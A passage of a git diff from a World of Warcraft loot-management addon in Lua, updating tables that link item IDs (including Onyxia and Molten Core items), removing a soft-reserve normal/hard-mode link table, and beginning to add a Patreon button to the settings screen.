= { - 78802, -- Necrotic Boneplate Greaves - 78803, -- Blackfang Battleweave Legguards - 78805, -- Deep Earth Legwraps - 78808, -- Deep Earth Legguards - 78809, -- Deep Earth Leggings - 78811, -- Necrotic Boneplate Legguards - 78815, -- Time Lord's Leggings + -- Soulstealer Mantle + ["228520"] = { + 13374, -- Soulstealer Mantle }, - -- Leggings of the Corrupted Conqueror - ["78872"] = { - 78807, -- Legplates of Radiant Glory - 78810, -- Legguards of Radiant Glory - 78812, -- Greaves of Radiant Glory - 78814, -- Legwraps of Dying Light - 78816, -- Leggings of the Faceless Shroud - 78817, -- Leggings of Dying Light + -- Shadowy Laced Handwraps + ["228521"] = { + 18730, -- Shadowy Laced Handwraps }, - -- Leggings of the Corrupted Protector - ["78873"] = { - 78799, -- Spiritwalker's Legguards - 78800, -- Colossal Dragonplate Legguards - 78801, -- Colossal Dragonplate Legplates - 78804, -- Wyrmstalker's Legguards - 78806, -- Spiritwalker's Kilt - 78813, -- Spiritwalker's Legwraps + -- Willey's Portable Howitzer + ["228522"] = { + 13380, -- Willey's Portable Howitzer }, - -- Shoulders of the Corrupted Vanquisher - ["78874"] = { - 78831, -- Necrotic Boneplate Pauldrons - 78833, -- Blackfang Battleweave Spaulders - 78835, -- Deep Earth Mantle - 78838, -- Deep Earth Spaulders - 78839, -- Deep Earth Shoulderwraps - 78843, -- Time Lord's Mantle - 78846, -- Necrotic Boneplate Shoulderguards + -- Cannonball Runner + ["228523"] = { + 13382, -- Cannonball Runner }, - -- Shoulders of the Corrupted Conqueror - ["78875"] = { - 78837, -- Pauldrons of Radiant Glory - 78840, -- Shoulderguards of Radiant Glory - 78841, -- Mantle of Radiant Glory - 78842, -- Mantle of Dying Light - 78844, -- Mantle of the Faceless Shroud - 78845, -- Mantle of Dying Light + -- The Postmaster's Seal + ["228524"] = { + 13392, -- The Postmaster's Seal }, - -- Shoulders of the Corrupted Protector - ["78876"] = { - 78828, -- Spiritwalker's Spaulders - 78829, -- Colossal Dragonplate Shoulderguards - 78830, -- Colossal Dragonplate Pauldrons - 78832, -- Wyrmstalker's Spaulders - 78834, -- Spiritwalker's Mantle - 78836, -- Spiritwalker's Shoulderwraps + -- The Postmaster's Tunic + ["228525"] = { + 13388, -- The Postmaster's Tunic }, - -- Avenger's Void Pearl - ["211449"] = { - 211452, -- Perfect Blackfathom Pearl + -- The Postmaster's Trousers + ["228527"] = { + 13389, -- The Postmaster's Trousers }, - -- Invoker's Void Pearl - ["211450"] = { - 211452, -- Perfect Blackfathom Pearl + -- The Postmaster's Band + ["228528"] = { + 13390, -- The Postmaster's Band }, - -- Acolyte's Void Pearl - ["211451"] = { - 211452, -- Perfect Blackfathom Pearl + -- The Postmaster's Treads + ["228529"] = { + 13391, -- The Postmaster's Treads }, - -- Perfect Blackfathom Pearl - ["211452"] = { - 211449, -- Avenger's Void Pearl - 211450, -- Invoker's Void Pearl - 211451, -- Acolyte's Void Pearl + -- Chitinous Plate Legguards + ["228530"] = { + 18739, -- Chitinous Plate Legguards }, - -- Hyperconductive Shimmershirt - ["213310"] = { - 217008, -- Power Depleted Chest + -- Thuzadin Sash + ["228531"] = { + 18740, -- Thuzadin Sash }, - -- Hyperconductive Robe - ["213311"] = { - 217008, -- Power Depleted Chest + -- Morlune's Bracer + ["228532"] = { + 18741, -- Morlune's Bracer }, - -- Insulated Apron - ["213312"] = { - 217008, -- Power Depleted Chest + -- Plaguehound Leggings + ["228534"] = { + 18736, -- Plaguehound Leggings }, - -- Insulated Chestguard - ["213313"] = { - 217008, -- Power Depleted Chest + -- Bone Slicing Hatchet + ["228535"] = { + 18737, -- Bone Slicing Hatchet }, - -- Electromantic Chainmail - ["213314"] = { - 217008, -- Power Depleted Chest + -- Star of Mystaria + ["228536"] = { + 12103, -- Star of Mystaria }, - -- Electromantic Chainshirt - ["213315"] = { - 217008, -- Power Depleted Chest + -- Dracorian Gauntlets + ["228537"] = { + 13344, -- Dracorian Gauntlets }, - -- H.A.Z.A.R.D. Breastplate - ["213316"] = { - 217008, -- Power Depleted Chest + -- Seal of Rivendare + ["228538"] = { + 13345, -- Seal of Rivendare }, - -- Hyperconductive Pantaloons - ["213328"] = { - 217009, -- Power Depleted Legs + -- Book of the Dead + ["228539"] = { + 13353, -- Book of the Dead }, - -- Hyperconductive Skirt - ["213329"] = { - 217009, -- Power Depleted Legs + -- Crown of Tyranny + ["228540"] = { + 13359, -- Crown of Tyranny }, - -- H.A.Z.A.R.D. Legplates - ["213330"] = { - 217009, -- Power Depleted Legs + -- Gift of the Elven Magi + ["228541"] = { + 13360, -- Gift of the Elven Magi }, - -- Insulated Leggings - ["213331"] = { - 217009, -- Power Depleted Legs + -- Skullforge Reaver + ["228542"] = { + 13361, -- Skullforge Reaver }, - -- Insulated Legguards - ["213332"] = { - 217009, -- Power Depleted Legs + -- Runeblade of Baron Rivendare + ["228543"] = { + 13505, -- Runeblade of Baron Rivendare }, - -- Electromantic Chausses - ["213333"] = { - 217009, -- Power Depleted Legs + -- Hammer of the Grand Crusader + ["228544"] = { + 18717, -- Hammer of the Grand Crusader }, - -- Electromantic Gambeson - ["213334"] = { - 217009, -- Power Depleted Legs + -- Grand Crusader's Helm + ["228545"] = { + 18718, -- Grand Crusader's Helm }, - -- H.A.Z.A.R.D. Boots - ["213335"] = { - 217007, -- Power Depleted Boots + -- Shroud of the Nathrezim + ["228546"] = { + 18720, -- Shroud of the Nathrezim }, - -- Hyperconductive Walkers - ["213336"] = { - 217007, -- Power Depleted Boots + -- Ironweave Robe + ["228547"] = { + 22301, -- Ironweave Robe }, - -- Hyperconductive Sandals - ["213337"] = { - 217007, -- Power Depleted Boots + -- Scepter of Interminable Focus + ["228548"] = { + 22329, -- Scepter of Interminable Focus }, - -- Electromantic Grounding Boots - ["213338"] = { - 217007, -- Power Depleted Boots + -- Tunic of the Crescent Moon + ["228551"] = { + 22409, -- Tunic of the Crescent Moon }, - -- Electromantic Grounding Sabatons - ["213339"] = { - 217007, -- Power Depleted Boots + -- Gauntlets of Deftness + ["228552"] = { + 22410, -- Gauntlets of Deftness }, - -- Insulated Workboots - ["213341"] = { - 217007, -- Power Depleted Boots + -- Helm of the Executioner + ["228553"] = { + 22411, -- Helm of the Executioner }, - -- Insulated Galoshes - ["213342"] = { - 217007, -- Power Depleted Boots + -- Demonskin Gloves + ["228554"] = { + 13181, -- Demonskin Gloves }, - -- Justice Badge - ["213343"] = { - 217351, -- Thermaplugg's Engineering Notes + -- Phase Blade + ["228555"] = { + 13182, -- Phase Blade }, - -- Gnomeregan Peace Officer's Torque - ["213344"] = { - 217351, -- Thermaplugg's Engineering Notes + -- Butcher's Apron + ["228556"] = { + 12608, -- Butcher's Apron }, - -- Piston Pendant - ["213345"] = { - 217351, -- Thermaplugg's Engineering Notes + -- Swiftdart Battleboots + ["228557"] = { + 13284, -- Swiftdart Battleboots }, - -- Pendant of Homecoming - ["213346"] = { - 217351, -- Thermaplugg's Engineering Notes + -- Funeral Cuffs + ["228558"] = { + 12626, -- Funeral Cuffs }, - -- Shockforged Battleboots - ["216484"] = { - 217007, -- Power Depleted Boots + -- Blackcrow + ["228559"] = { + 12651, -- Blackcrow }, - -- Shockforged Breastplate - ["216485"] = { - 217008, -- Power Depleted Chest + -- Trueaim Gauntlets + ["228561"] = { + 13255, -- Trueaim Gauntlets }, - -- Shockforged Legplates - ["216486"] = { - 217009, -- Power Depleted Legs + -- Demonic Runed Spaulders + ["228562"] = { + 13257, -- Demonic Runed Spaulders + }, + -- Globe of D'sak + ["228563"] = { + 13261, -- Globe of D'sak + }, + -- Ogreseer Tower Boots + ["228564"] = { + 13282, -- Ogreseer Tower Boots + }, + -- Magus Ring + ["228565"] = { + 13283, -- Magus Ring + }, + -- Starfire Tiara + ["228566"] = { + 12604, -- Starfire Tiara + }, + -- Chiselbrand Girdle + ["228567"] = { + 12634, -- Chiselbrand Girdle + }, + -- Backusarian Gauntlets + ["228568"] = { + 12637, -- Backusarian Gauntlets + }, + -- Fist of Omokk + ["228570"] = { + 13167, -- Fist of Omokk + }, + -- Plate of the Shaman King + ["228571"] = { + 13168, -- Plate of the Shaman King }, - -- Power Depleted Boots - ["217007"] = { - 213335, -- H.A.Z.A.R.D. Boots - 213336, -- Hyperconductive Walkers - 213337, -- Hyperconductive Sandals - 213338, -- Electromantic Grounding Boots - 213339, -- Electromantic Grounding Sabatons - 213341, -- Insulated Workboots - 213342, -- Insulated Galoshes - 216484, -- Shockforged Battleboots + -- Brazecore Armguards + ["228572"] = { + 13179, -- Brazecore Armguards }, - -- Power Depleted Chest - ["217008"] = { - 213310, -- Hyperconductive Shimmershirt - 213311, -- Hyperconductive Robe - 213312, -- Insulated Apron - 213313, -- Insulated Chestguard - 213314, -- Electromantic Chainmail - 213315, -- Electromantic Chainshirt - 213316, -- H.A.Z.A.R.D. Breastplate - 216485, -- Shockforged Breastplate + -- Venomspitter + ["228573"] = { + 13183, -- Venomspitter }, - -- Power Depleted Legs - ["217009"] = { - 213328, -- Hyperconductive Pantaloons - 213329, -- Hyperconductive Skirt - 213330, -- H.A.Z.A.R.D. Legplates - 213331, -- Insulated Leggings - 213332, -- Insulated Legguards - 213333, -- Electromantic Chausses - 213334, -- Electromantic Gambeson - 216486, -- Shockforged Legplates + -- Talisman of Evasion + ["228574"] = { + 13177, -- Talisman of Evasion }, - -- Thermaplugg's Engineering Notes - ["217351"] = { - 213343, -- Justice Badge - 213344, -- Gnomeregan Peace Officer's Torque - 213345, -- Piston Pendant - 213346, -- Pendant of Homecoming + -- Slashclaw Bracers + ["228575"] = { + 13211, -- Slashclaw Bracers }, - -- Drakeclaw Band of the Berserker - ["220626"] = { - 221363, -- Scapula of the Fallen Avatar + -- Smolderweb's Eye + ["228576"] = { + 13213, -- Smolderweb's Eye }, - -- Drakeclaw Band of the Stalker - ["220627"] = { - 221363, -- Scapula of the Fallen Avatar + -- Gilded Gauntlets + ["228577"] = { + 13244, -- Gilded Gauntlets }, - -- Drakeclaw Band of the Harbinger - ["220628"] = { - 221363, -- Scapula of the Fallen Avatar + -- Dustfeather Sash + ["228578"] = { + 12589, -- Dustfeather Sash }, - -- Drakeclaw Band of the Blood Prophet - ["220629"] = { - 221363, -- Scapula of the Fallen Avatar + -- Crystallized Girdle + ["228579"] = { + 12606, -- Crystallized Girdle }, - -- Drakeclaw Band of the Juggernaut - ["220630"] = { - 221363, -- Scapula of the Fallen Avatar + -- Truestrike Shoulders + ["228583"] = { + 12927, -- Truestrike Shoulders }, - -- Atal'ai Blood Icon - ["220636"] = { - 220642, -- Banished Martyr's Plate Armor - 220643, -- Banished Martyr's Plate Legguards - 220648, -- Banished Martyr's Plate Boots - 220650, -- Obsessed Prophet's Chestplate - 220651, -- Obsessed Prophet's Legguards - 220652, -- Obsessed Prophet's Ornate Boots - 220653, -- Wailing Berserker's Chestplate - 220654, -- Wailing Berserker's Legplates - 220656, -- Wailing Berserker's Battleboots - 220657, -- Ostracized Berserker's Hauberk - 220658, -- Ostracized Berserker's Legplates - 220659, -- Ostracized Berserker's Chain Greaves - 220660, -- Shunned Devotee's Chainshirt - 220661, -- Shunned Devotee's Legguards - 220662, -- Shunned Devotee's Scale Boots - 220663, -- Corrupted Spiritweaver's Leggings - 220664, -- Corrupted Spiritweaver's Sabatons - 220665, -- Corrupted Spiritweaver's Breastplate - 220666, -- Dread Hunter's Chainmail - 220667, -- Dread Hunter's Chausses - 220668, -- Dread Hunter's Greaves - 220676, -- Blood Corrupted Tunic - 220677, -- Blood Corrupted Boots - 220678, -- Blood Corrupted Pants + -- Emberfury Talisman + ["228584"] = { + 12929, -- Emberfury Talisman }, - -- Atal'ai Ritual Token - ["220637"] = { - 220669, -- Exiled Prophet's Jerkin - 220670, -- Exiled Prophet's Slippers - 220671, -- Exiled Prophet's Leather Pants - 220672, -- Lost Worshipper's Harness - 220673, -- Lost Worshipper's Leggings - 220675, -- Lost Worshipper's Treads - 220679, -- Malevolent Prophet's Leggings - 220680, -- Malevolent Prophet's Vest - 220681, -- Malevolent Prophet's Sandals - 220683, -- Benevolent Prophet's Vest - 220684, -- Benevolent Prophet's Leggings - 220685, -- Benevolent Prophet's Sandals - 220778, -- Coagulated Bloodguard Pants - 220779, -- Coagulated Bloodguard Tunic - 220780, -- Coagulated Bloodguard Boots - 220781, -- Nightmare Prophet's Leggings - 220783, -- Nightmare Prophet's Vestments - 220784, -- Nightmare Prophet's Sandals + -- Mark of the Dragon Lord + ["228585"] = { + 13143, -- Mark of the Dragon Lord }, - -- Banished Martyr's Plate Armor - ["220642"] = { - 220636, -- Atal'ai Blood Icon + -- Chillpike + ["228586"] = { + 13148, -- Chillpike }, - -- Banished Martyr's Plate Legguards - ["220643"] = { - 220636, -- Atal'ai Blood Icon + -- Trindlehaven Staff + ["228587"] = { + 13161, -- Trindlehaven Staff }, - -- Banished Martyr's Plate Boots - ["220648"] = { - 220636, -- Atal'ai Blood Icon + -- Reiver Claws + ["228588"] = { + 13162, -- Reiver Claws }, - -- Obsessed Prophet's Chestplate - ["220650"] = { - 220636, -- Atal'ai Blood Icon + -- Heart of the Scale + ["228589"] = { + 13164, -- Heart of the Scale }, - -- Obsessed Prophet's Legguards - ["220651"] = { - 220636, -- Atal'ai Blood Icon + -- Sunderseer Mantle + ["228590"] = { + 13185, -- Sunderseer Mantle }, - -- Obsessed Prophet's Ornate Boots - ["220652"] = { - 220636, -- Atal'ai Blood Icon + -- Rhombeard Protector + ["228591"] = { + 13205, -- Rhombeard Protector }, - -- Wailing Berserker's Chestplate - ["220653"] = { - 220636, -- Atal'ai Blood Icon + -- Fang of the Crystal Spider + ["228592"] = { + 13218, -- Fang of the Crystal Spider }, - -- Wailing Berserker's Legplates - ["220654"] = { - 220636, -- Atal'ai Blood Icon + -- Wind Dancer Boots + ["228593"] = { + 13260, -- Wind Dancer Boots }, - -- Wailing Berserker's Battleboots - ["220656"] = { - 220636, -- Atal'ai Blood Icon + -- Kayser's Boots of Precision + ["228594"] = { + 22231, -- Kayser's Boots of Precision }, - -- Ostracized Berserker's Hauberk - ["220657"] = { - 220636, -- Atal'ai Blood Icon + -- Marksman's Girdle + ["228595"] = { + 22232, -- Marksman's Girdle }, - -- Ostracized Berserker's Legplates - ["220658"] = { - 220636, -- Atal'ai Blood Icon + -- Ironweave Belt + ["228596"] = { + 22306, -- Ironweave Belt }, - -- Ostracized Berserker's Chain Greaves - ["220659"] = { - 220636, -- Atal'ai Blood Icon + -- Ironweave Boots + ["228597"] = { + 22311, -- Ironweave Boots }, - -- Shunned Devotee's Chainshirt - ["220660"] = { - 220636, -- Atal'ai Blood Icon + -- Ironweave Bracers + ["228598"] = { + 22313, -- Ironweave Bracers }, - -- Shunned Devotee's Legguards - ["220661"] = { - 220636, -- Atal'ai Blood Icon + -- Heart of Wyrmthalak + ["228599"] = { + 22321, -- Heart of Wyrmthalak }, - -- Shunned Devotee's Scale Boots - ["220662"] = { - 220636, -- Atal'ai Blood Icon + -- The Jaw Breaker + ["228600"] = { + 22322, -- The Jaw Breaker }, - -- Corrupted Spiritweaver's Leggings - ["220663"] = { - 220636, -- Atal'ai Blood Icon + -- Relentless Scythe + ["228601"] = { + 13163, -- Relentless Scythe }, - -- Corrupted Spiritweaver's Sabatons - ["220664"] = { - 220636, -- Atal'ai Blood Icon + -- Flame Walkers + ["228602"] = { + 18047, -- Flame Walkers }, - -- Corrupted Spiritweaver's Breastplate - ["220665"] = { - 220636, -- Atal'ai Blood Icon + -- Blackhand Doomsaw + ["228603"] = { + 12583, -- Blackhand Doomsaw }, - -- Dread Hunter's Chainmail - ["220666"] = { - 220636, -- Atal'ai Blood Icon + -- Eye of Rend + ["228604"] = { + 12587, -- Eye of Rend }, - -- Dread Hunter's Chausses - ["220667"] = { - 220636, -- Atal'ai Blood Icon + -- Bonespike Shoulder + ["228605"] = { + 12588, -- Bonespike Shoulder }, - -- Dread Hunter's Greaves - ["220668"] = { - 220636, -- Atal'ai Blood Icon + -- Blackblade of Shahram + ["228606"] = { + 12592, -- Blackblade of Shahram }, - -- Exiled Prophet's Jerkin - ["220669"] = { - 220637, -- Atal'ai Ritual Token + -- Warmaster Legguards + ["228650"] = { + 12935, -- Warmaster Legguards }, - -- Exiled Prophet's Slippers - ["220670"] = { - 220637, -- Atal'ai Ritual Token + -- Battleborn Armbraces + ["228651"] = { + 12936, -- Battleborn Armbraces }, - -- Exiled Prophet's Leather Pants - ["220671"] = { - 220637, -- Atal'ai Ritual Token + -- Dal'Rend's Tribal Guardian + ["228652"] = { + 12939, -- Dal'Rend's Tribal Guardian }, - -- Lost Worshipper's Harness - ["220672"] = { - 220637, -- Atal'ai Ritual Token + -- Dal'Rend's Sacred Charge + ["228653"] = { + 12940, -- Dal'Rend's Sacred Charge }, - -- Lost Worshipper's Leggings - ["220673"] = { - 220637, -- Atal'ai Ritual Token + -- Ancient Rune Etched Stave + ["228659"] = { + 18707, -- Ancient Rune Etched Stave }, - -- Lost Worshipper's Treads - ["220675"] = { - 220637, -- Atal'ai Ritual Token + -- Blademaster Leggings + ["228660"] = { + 12963, -- Blademaster Leggings }, - -- Blood Corrupted Tunic - ["220676"] = { - 220636, -- Atal'ai Blood Icon + -- Tristam Legguards + ["228661"] = { + 12964, -- Tristam Legguards }, - -- Blood Corrupted Boots - ["220677"] = { - 220636, -- Atal'ai Blood Icon + -- Blackmist Armguards + ["228662"] = { + 12966, -- Blackmist Armguards }, - -- Blood Corrupted Pants - ["220678"] = { - 220636, -- Atal'ai Blood Icon + -- Bloodmoon Cloak + ["228663"] = { + 12967, -- Bloodmoon Cloak }, - -- Malevolent Prophet's Leggings - ["220679"] = { - 220637, -- Atal'ai Ritual Token + -- Frostweaver Cape + ["228664"] = { + 12968, -- Frostweaver Cape }, - -- Malevolent Prophet's Vest - ["220680"] = { - 220637, -- Atal'ai Ritual Token + -- Seeping Willow + ["228666"] = { + 12969, -- Seeping Willow }, - -- Malevolent Prophet's Sandals - ["220681"] = { - 220637, -- Atal'ai Ritual Token + -- Painweaver Band + ["228667"] = { + 13098, -- Painweaver Band }, - -- Benevolent Prophet's Vest - ["220683"] = { - 220637, -- Atal'ai Ritual Token + -- Tooth of Gnarr + ["228669"] = { + 13141, -- Tooth of Gnarr }, - -- Benevolent Prophet's Leggings - ["220684"] = { - 220637, -- Atal'ai Ritual Token + -- Brigam Girdle + ["228670"] = { + 13142, -- Brigam Girdle }, - -- Benevolent Prophet's Sandals - ["220685"] = { - 220637, -- Atal'ai Ritual Token + -- Handcrafted Mastersmith Girdle + ["228672"] = { + 13502, -- Handcrafted Mastersmith Girdle }, - -- Coagulated Bloodguard Pants - ["220778"] = { - 220637, -- Atal'ai Ritual Token + -- Band of Rumination + ["228675"] = { + 18103, -- Band of Rumination }, - -- Coagulated Bloodguard Tunic - ["220779"] = { - 220637, -- Atal'ai Ritual Token + -- Feralsurge Girdle + ["228676"] = { + 18104, -- Feralsurge Girdle }, - -- Coagulated Bloodguard Boots - ["220780"] = { - 220637, -- Atal'ai Ritual Token + -- Spellweaver's Turban + ["228677"] = { + 22267, -- Spellweaver's Turban }, - -- Nightmare Prophet's Leggings - ["220781"] = { - 220637, -- Atal'ai Ritual Token + -- Draconic Infused Emblem + ["228678"] = { + 22268, -- Draconic Infused Emblem }, - -- Nightmare Prophet's Vestments - ["220783"] = { - 220637, -- Atal'ai Ritual Token + -- Quel'Serrar + ["228679"] = { + 18348, -- Quel'Serrar }, - -- Nightmare Prophet's Sandals - ["220784"] = { - 220637, -- Atal'ai Ritual Token + -- Ironweave Cowl + ["228681"] = { + 22302, -- Ironweave Cowl }, - -- Scapula of the Fallen Avatar - ["221363"] = { - 220626, -- Drakeclaw Band of the Berserker - 220627, -- Drakeclaw Band of the Stalker - 220628, -- Drakeclaw Band of the Harbinger - 220629, -- Drakeclaw Band of the Blood Prophet - 220630, -- Drakeclaw Band of the Juggernaut + -- Lord Valthalak's Staff of Command + ["228682"] = { + 22335, -- Lord Valthalak's Staff of Command + }, + -- Rune Band of Wizardry + ["228683"] = { + 22339, -- Rune Band of Wizardry + }, + -- Pendant of Celerity + ["228684"] = { + 22340, -- Pendant of Celerity }, -- Onyxia Tooth Pendant ["228685"] = { - 228689, -- Head of Onyxia + 18404, -- Onyxia Tooth Pendant }, -- Onyxia Blood Talisman ["228686"] = { - 228689, -- Head of Onyxia + 18406, -- Onyxia Blood Talisman + 18423, -- Head of Onyxia (Alliance) }, -- Dragonslayer's Signet ["228687"] = { - 228689, -- Head of Onyxia + 18403, -- Dragonslayer's Signet }, -- Head of Onyxia ["228689"] = { + 18422, -- Head of Onyxia (Horde) 228685, -- Onyxia Tooth Pendant 228686, -- Onyxia Blood Talisman 228687, -- Dragonslayer's Signet }, + -- The Light and How to Swing It + ["228690"] = { + 18359, -- The Light and How to Swing It + }, + -- Garona: A Study on Stealth and Treachery + ["228691"] = { + 18356, -- Garona: A Study on Stealth and Treachery + }, + -- Codex of Defense + ["228692"] = { + 18357, -- Codex of Defense + }, + -- The Arcanist's Cookbook + ["228693"] = { + 18358, -- The Arcanist's Cookbook + }, + -- A Dull and Flat Elven Blade + ["228695"] = { + 18513, -- A Dull and Flat Elven Blade + }, + -- Heated Ancient Blade + ["228696"] = { + 18488, -- Heated Ancient Blade + }, + -- Treated Ancient Blade + ["228697"] = { + 18492, -- Treated Ancient Blade + }, + -- Ring of Demonic Guile + ["228699"] = { + 18314, -- Ring of Demonic Guile + }, + -- Ironweave Mantle + ["228700"] = { + 22305, -- Ironweave Mantle + }, + -- Drillborer Disk + ["228702"] = { + 17066, -- Drillborer Disk + }, + -- Coldstone Slippers + ["228703"] = { + 18697, -- Coldstone Slippers + }, + -- Tattered Leather Hood + ["228704"] = { + 18698, -- Tattered Leather Hood + }, + -- Hand of Justice + ["228722"] = { + 11815, -- Hand of Justice + }, + -- Fluorescent Green Mechanostrider + ["228746"] = { + 13325, -- Fluorescent Green Mechanostrider + }, + -- Felstriker + ["228757"] = { + 12590, -- Felstriker + }, + -- Ancient Cornerstone Grimoire + ["228955"] = { + 17067, -- Ancient Cornerstone Grimoire + }, + -- Onyxia Hide Backpack + ["228992"] = { + 17966, -- Onyxia Hide Backpack + }, + -- Pattern: Bottomless Bag + ["228993"] = { + 14510, -- Pattern: Bottomless Bag + }, + -- Bottomless Bag + ["228994"] = { + 14156, -- Bottomless Bag + }, }; \ No newline at end of file diff --git a/Data/NormalModeHardModeLinks.lua b/Data/NormalModeHardModeLinks.lua index 8a16d3db..e70df0de 100644 --- a/Data/NormalModeHardModeLinks.lua +++ b/Data/NormalModeHardModeLinks.lua @@ -4,306 +4,6 @@ local _, GL = ...; ---@class NormalModeHardModeLinks : Data GL.Data = GL.Data or {}; -GL.Data.SoftResSpecificNormalModeHardModeLinks = { - -- Earthfury Boots - ["16837"] = { 226613, }, - ["226613"] = { 16837, }, - - -- Robe of Volatile Power - ["19145"] = { 228239, }, - ["228239"] = { 19145, }, - - -- Manastorm Leggings - ["18872"] = { 228244, }, - ["228244"] = { 18872, }, - - -- Salamander Scale Pants - ["18875"] = { 228245, }, - ["228245"] = { 18875, }, - - -- Wristguards of Stability - ["19146"] = { 228246, }, - ["228246"] = { 19146, }, - - -- Helm of the Lifegiver - ["18870"] = { 228285, }, - ["228285"] = { 18870, }, - - -- Flamewaker Legplates - ["18861"] = { 228240, }, - ["228240"] = { 18861, }, - - -- Choker of Enlightenment - ["17109"] = { 228247, }, - ["228247"] = { 17109, }, - - -- Ring of Spell Power - ["19147"] = { 228243, }, - ["228243"] = { 19147, }, - - -- Heavy Dark Iron Ring - ["18879"] = { 228242, }, - ["228242"] = { 18879, }, - - -- Sorcerous Dagger - ["18878"] = { 228263, }, - ["228263"] = { 18878, }, - - -- Crimson Shocker - ["17077"] = { 228262, }, - ["228262"] = { 17077, }, - - -- Earthfury Legguards - ["16843"] = { 226614, }, - ["226614"] = { 16843, }, - - -- Mana Igniting Cord - ["19136"] = { 228256, }, - ["228256"] = { 19136, }, - - -- Aged Core Leather Gloves - ["18823"] = { 228257, }, - ["228257"] = { 18823, }, - - -- Sabatons of the Flamewalker - ["19144"] = { 228253, }, - ["228253"] = { 19144, }, - - -- Deep Earth Spaulders - ["18829"] = { 228258, }, - ["228258"] = { 18829, }, - - -- Magma Tempered Boots - ["18824"] = { 228254, }, - ["228254"] = { 18824, }, - - -- Flameguard Gauntlets - ["19143"] = { 228260, }, - ["228260"] = { 19143, }, - - -- Talisman of Ephemeral Power - ["18820"] = { 228255, }, - ["228255"] = { 18820, }, - - -- Quick Strike Ring - ["18821"] = { 228261, }, - ["228261"] = { 18821, }, - - -- Medallion of Steadfast Might - ["17065"] = { 228249, }, - ["228249"] = { 17065, }, - - -- Fire Runed Grimoire - ["19142"] = { 228259, }, - ["228259"] = { 19142, }, - - -- Eskhandar's Right Claw - ["18203"] = { 228350, }, - ["228350"] = { 18203, }, - - -- Obsidian Edged Blade - ["18822"] = { 228229, }, - ["228229"] = { 18822, }, - - -- Earthshaker - ["17073"] = { 228248, }, - ["228248"] = { 17073, }, - - -- Striker's Mark - ["17069"] = { 228252, }, - ["228252"] = { 17069, }, - - -- Earthfury Gauntlets - ["16839"] = { 226615, }, - ["226615"] = { 16839, }, - - -- Earthfury Helmet - ["16842"] = { 226612, }, - ["226612"] = { 16842, }, - - -- Aurastone Hammer - ["17105"] = { 228264, }, - ["228264"] = { 17105, }, - - -- Gutgore Ripper - ["17071"] = { 228267, }, - ["228267"] = { 17071, }, - - -- Brutality Blade - ["18832"] = { 228265, }, - ["228265"] = { 18832, }, - - -- Drillborer Disk - ["17066"] = { 228266, }, - ["228266"] = { 17066, }, - - -- Earthfury Epaulets - ["16844"] = { 226611, }, - ["226611"] = { 16844, }, - - -- Seal of the Archmagus - ["17110"] = { 228268, }, - ["228268"] = { 17110, }, - - -- Earthfury Vestments - ["16841"] = { 226617, }, - ["226617"] = { 16841, }, - - -- Azuresong Mageblade - ["17103"] = { 228269, }, - ["228269"] = { 17103, }, - - -- Staff of Dominance - ["18842"] = { 228271, }, - ["228271"] = { 18842, }, - - -- Blastershot Launcher - ["17072"] = { 228270, }, - ["228270"] = { 17072, }, - - -- Shadowstrike - ["17074"] = { 228272, }, - ["228272"] = { 17074, }, - - -- Sash of Whispered Secrets - ["18809"] = { 228282, }, - ["228282"] = { 18809, }, - - -- Gloves of the Hypnotic Flame - ["18808"] = { 228281, }, - ["228281"] = { 18808, }, - - -- Wild Growth Spaulders - ["18810"] = { 228283, }, - ["228283"] = { 18810, }, - - -- Fireguard Shoulders - ["19139"] = { 228279, }, - ["228279"] = { 19139, }, - - -- Wristguards of True Flight - ["18812"] = { 228284, }, - ["228284"] = { 18812, }, - - -- Core Forged Greaves - ["18806"] = { 228275, }, - ["228275"] = { 18806, }, - - -- Fireproof Cloak - ["18811"] = { 228280, }, - ["228280"] = { 18811, }, - - -- Cauterizing Band - ["19140"] = { 228274, }, - ["228274"] = { 19140, }, - - -- Core Hound Tooth - ["18805"] = { 228277, }, - ["228277"] = { 18805, }, - - -- Hyperthermically Insulated Lava Dredger - ["18803"] = { 228278, }, - ["228278"] = { 18803, }, - - -- Eye of Sulfuras - ["17204"] = { 227728, }, - ["227728"] = { 17204, }, - - -- Crown of Destruction - ["18817"] = { 228291, }, - ["228291"] = { 18817, }, - - -- Onslaught Girdle - ["19137"] = { 228295, }, - ["228295"] = { 19137, }, - - -- Choker of the Fire Lord - ["18814"] = { 228289, }, - ["228289"] = { 18814, }, - - -- Band of Sulfuras - ["19138"] = { 228287, }, - ["228287"] = { 19138, }, - - -- Cloak of the Shrouded Mists - ["17102"] = { 228290, }, - ["228290"] = { 17102, }, - - -- Dragon's Blood Cape - ["17107"] = { 228292, }, - ["228292"] = { 17107, }, - - -- Band of Accuria - ["17063"] = { 228286, }, - ["228286"] = { 17063, }, - - -- Shard of the Flame - ["17082"] = { 228297, }, - ["228297"] = { 17082, }, - - -- Essence of the Pure Flame - ["18815"] = { 228293, }, - ["228293"] = { 18815, }, - - -- Malistar's Defender - ["17106"] = { 228294, }, - ["228294"] = { 17106, }, - - -- Perdition's Blade - ["18816"] = { 228296, }, - ["228296"] = { 18816, }, - - -- Spinal Reaper - ["17104"] = { 228299, }, - ["228299"] = { 17104, }, - - -- Bonereaver's Edge - ["17076"] = { 228288, }, - ["228288"] = { 17076, }, - - -- Sulfuras, Hand of Ragnaros - ["17182"] = { 227683, }, - ["227683"] = { 17182, }, - - - -- Head of Onyxia - ["18423"] = { 228688, }, - ["228688"] = { 18423, }, - - -- Head of Onyxia - ["18422"] = { 228689, }, - ["228689"] = { 18422, }, - - -- Shard of the Scale - ["17064"] = { 228298, }, - ["228298"] = { 17064, }, - - -- Eskhandar's Collar - ["18205"] = { 228759, }, - ["228759"] = { 18205, }, - - -- Ancient Cornerstone Grimoire - ["17067"] = { 228955, }, - ["228955"] = { 17067, }, - - -- Onyxia Hide Backpack - ["17966"] = { 228992, }, - ["228992"] = { 17966, }, - - -- Onyxia Tooth Pendant - ["18404"] = { 228685, }, - ["228685"] = { 18404, }, - - -- Dragonslayer's Signet - ["18403"] = { 228687, }, - ["228687"] = { 18403, }, - - -- Onyxia Blood Talisman - ["18406"] = { 228686, }, - ["228686"] = { 18406, }, - -}; - GL.Data.NormalModeHardModeLinks = { -- Blackwing Descent -- Power Generator Hood diff --git a/Interface/Settings/Overview.lua b/Interface/Settings/Overview.lua index 610f0fc3..86a4f7ba 100644 --- a/Interface/Settings/Overview.lua +++ b/Interface/Settings/Overview.lua @@ -208,6 +208,28 @@ function Overview:draw(section, onCloseCallback) ResetSettingsButton:SetWidth(136); SecondColumn:AddChild(ResetSettingsButton); + local PatreonButton = GL.UI:createFrame("Button", "PatreonButton" 